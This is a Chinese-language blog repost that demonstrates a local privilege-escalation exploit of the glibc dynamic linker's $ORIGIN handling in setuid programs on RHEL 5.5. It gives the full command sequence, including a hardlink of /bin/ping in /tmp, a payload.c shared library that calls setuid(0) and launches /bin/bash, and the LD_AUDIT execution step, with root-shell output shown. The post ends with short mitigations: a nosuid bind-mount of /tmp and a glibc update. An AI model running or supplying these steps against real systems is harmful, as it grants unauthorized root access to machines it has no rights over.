linux gcc++漏洞:普通用户获得root权限

纵然是瞬间 提交于 2020-08-16 22:39:35

linux gcc++漏洞:普通用户获得root权限  

*本内容参考自他人博客文章*


Crushlinux 已经在RHEL5.5 32上测试过


原理:The GNU C library dynamic linker expands $ORIGIN in setuid library search path


1、创建一个普通测试用户:

[root@crushlinux4 ~]# useradd test
[root@crushlinux4 ~]# passwd test
Changing password for user test.
New UNIX password:
BAD PASSWORD: it is too short
Retype new UNIX password:
passwd: all authentication tokens updated successfully.


2、切换到这个用户:

[root@crushlinux4 ~]# su - test
[test@crushlinux4 ~]$ whoami
test
[test@crushlinux4 ~]$ useradd user1
-bash: useradd: command not found


3、开始提权

[test@crushlinux4 ~]$ mkdir /tmp/exploit
[test@crushlinux4 ~]$ ln /bin/ping /tmp/exploit/target
[test@crushlinux4 ~]$ exec 3< /tmp/exploit/target
[test@crushlinux4 ~]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 08-07 17:43 /proc/5922/fd/3 -> /tmp/exploit/target
[test@crushlinux4 ~]$ rm -rf /tmp/exploit/
[test@crushlinux4 ~]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 08-07 17:43 /proc/5922/fd/3 -> /tmp/exploit/target (deleted)
[test@crushlinux4 ~]$ cat > payload.c
----------------------------------------
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
----------------------------------------
[test@crushlinux4 ~]$ cat payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
[test@crushlinux4 ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@crushlinux4 ~]$ ls -l /tmp/exploit
-rwxrwxr-x 1 test test 4223 08-07 17:43 /tmp/exploit
[test@crushlinux4 ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination


4、权限验证:

[root@crushlinux4 ~]# whoami
root
[root@crushlinux4 ~]# useradd user1
[root@crushlinux4 ~]# useradd user2
[root@crushlinux4 ~]# ls /home/
test  user1  user2
[root@crushlinux4 ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


大家看到提权后的结果了,作为运维工程师遇到这类问题,就需要提供解决方法了!


有两种解决办法:

1、绑定目录

nosuid的原理:像/etc/passwd这种文件,本来只有root用户有权限修改,但是用户本身也可以修改自己的密码(超出它本身权限的行为)nosuid可以停止这种提升特权的办法。比如/tmp目录就有这样的权限,我们就需要对它严加控制。


mount -o bind /tmp /tmp
mount -o remount,bind,nosuid /tmp /tmp


2、更新glibc版本(红帽官方推荐)

yum -y update glibc


希望看到此文章的运维同事们能够及时的更新软件及补丁。

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!